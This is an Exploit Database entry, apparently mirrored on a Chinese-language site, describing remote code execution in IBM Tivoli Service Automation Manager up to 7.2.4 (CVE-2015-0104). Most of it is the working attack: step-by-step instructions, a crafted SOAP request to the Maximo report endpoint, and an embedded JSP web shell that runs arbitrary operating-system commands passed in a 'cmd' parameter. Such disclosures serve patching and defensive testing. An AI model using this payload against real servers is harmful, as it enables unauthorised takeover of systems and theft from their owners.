IBM Tivoli Service Automation Manager 7.2.4 – Remote Code Execution

• Exploit Database
• 137 阅读

• 作者： Jakub Palaczynski
  日期： 2014-12-12
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/36002/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70

  # Exploit Title: IBM Tivoli Service Automation Manager Remote Code Execution # Date: 12\12\2014 # Exploit Author: Jakub Palaczynski # Vendor Homepage: http://www.ibm.com/ # Version: All versions of IBM Tivoli Service Automation Manager up to 7.2.4 # VU/CVE: VU#782708, CVE-2015-0104   1. Create report 2. Browse to: https://site/maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&reportNum= 3. Catch SOAP request generated by submitting form from previous step and inject JSP payload. Sample SOAP request:   POST /maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&__sessionId=<valid_sessionid> HTTP/1.1   Host: site Content-Length: xxx   <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetUpdatedObjects xmlns="http://schemas.eclipse.org/birt"><Operation><Target><Id>Document</Id><Type>Document</Type></Target><Operator>GetPage</Operator><Oprand><Name>where</Name><Value>aaaaaaaaaaaaaaaaaaaaaa<![CDATA[<%@ page import="java.util.*,java.io.*"%>   <%   try {   String cmd;   String[] cmdarr;   String OS = System.getProperty("os.name");   if (request.getParameter("cmd") != null) {   cmd = new String (request.getParameter("cmd"));   if (OS.startsWith("Windows")) {   cmdarr = new String [] {"cmd", "/C", cmd};   }   else {   cmdarr = new String [] {"/bin/sh", "-c", cmd};   }   Process p = Runtime.getRuntime().exec(cmdarr);   OutputStream os = p.getOutputStream();   InputStream in = p.getInputStream();   DataInputStream dis = new DataInputStream(in);   String disr = dis.readLine();   while ( disr != null ) {   out.println(disr);   disr = dis.readLine();   }   }   } catch (Exception e) { e.printStackTrace();}   %>]]>aaaaaaaaaaaaaaaaaaaaaa</Value></Oprand><Oprand><Name>__isdisplay__where</Name><Value></Value></Oprand><Oprand><Name>appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>__isdisplay__appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__isdisplay__usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__svg</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__taskid</Name><Value></Value></Oprand></Operation></GetUpdatedObjects></soap:Body></soap:Envelope>   4. Web shell is now ready to use in path specified in __document parameter&apos;s value